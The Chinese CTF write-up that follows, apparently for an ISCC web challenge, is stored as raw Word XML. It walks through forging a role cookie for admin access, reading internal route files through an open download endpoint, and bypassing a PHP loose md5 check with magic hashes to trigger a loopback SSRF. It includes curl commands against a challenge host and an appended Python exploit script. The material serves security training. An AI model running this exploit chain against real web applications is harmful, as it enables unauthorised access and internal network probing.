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eader-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">详细利用步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">挖掘并伪造前端鉴权机制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打开目标站点首页，我们会发现浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中直接明文保存了当前访客的身份与权限标识。页面上的提示文案也印证了后台依然兼容“浏览器侧旧标记”，并且明确指出了后台的管理入口为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。此时，若将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie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mail_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数由普通的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篡改为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，再次请求该后台页面，HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应状态便会从禁止访问的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 403 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变更为成功的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">200。这印证了后端程序存在越权漏洞，盲目信任了未经过滤和签名的客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据。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curl -i -H 'Cookie: mail_user=guest; mail_role=admin' http://39.105.213.28:49103/admin.php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Only admin can access this page. -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">切换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后返回后台预览面板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用开放接口获取内部路由信息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系统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">download.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口允许外部访客随意下载后台相关的说明文档，不存在任何管理员权限校验。由此我们可以首先拉取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preview-readme.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，随后顺藤摸瓜读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">route-index.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。读取该文件后，能够发现联调阶段保留下来的内部接口别名映射关系，其中名为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的路由对应着一个只能在内网环境中访问的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">视图。这一环节使得我们的攻击目标变得明朗：即寻找方法让服务器去请求这个隐蔽的内网地址。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curl 'http://39.105.213.28:49103/download.php?file=files/notes/route-index.txt'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得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> health / mailq / final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个内部诊断别名，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应内网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n17"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">借助哈希碰撞突破复核并达成内网请求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分析后台的数据提交表单，它要求用户提供两份完全不同的凭证，但系统后端的校验代码却存在典型的缺陷，使用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">md5($a) == md5($b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种弱类型比较。对此，我们可以传入著名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MD5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">魔术哈希值（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">240610708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QNKCDZO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）来满足该比对条件，顺利通过双人复核逻辑。接下来，将需要请求的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">target_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数指定为本地回环（loopback）地址的完整绝对链接。这里需要格外小心：内部查询的参数必须作为一个整体进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码处理，否则类似于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;slot=last</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容会被外部表单引擎直接拆分截断。成功提交后，系统后端的预览组件会以管理员身份在本地（127.0.0.1）读取隐蔽的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面，并在界面上回显包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的结果。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curl -s -H 'Cookie: mail_user=guest; mail_role=admin' -X POST 'http://39.105.213.28:49103/admin.php' -d 'token_a=240610708' -d 'token_b=QNKCDZO' --data-urlencode 'target_url=http://127.0.0.1/internal/report?view=flag&amp;slot=last'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  <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回结果区回显最终</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="header-n24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终利用测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合上述所有环节，将篡改越权后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、用于绕过验证的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> magic-hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">凭据以及深度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码后的本地请求目标组装在一起，向后台预览接口发送数据包即可完成整个利用过程。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zhiban_mail_exp.py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ISCC{vX3mQ9sLp7TaN2wK6cRdY8Hz}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="header-n30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录1：自动化攻击脚本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"http://39.105.213.28:49103"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_A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"240610708"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MAGIC_B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"QNKCDZO"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FINAL_URL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"http://127.0.0.1/internal/report?view=flag&amp;slot=last"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requests.Session()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    session.cookies.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"mail_user"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session.cookies.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"mail_role"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/admin.php"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"token_a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: MAGIC_A,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"token_b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: MAGIC_B,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"target_url"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: FINAL_URL,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[^&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\s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response.text)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"[!] flag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14"/>
    <w:bookmarkStart w:id="15" w:name="header-n32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2026-05-16T03:56:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T03:56:17Z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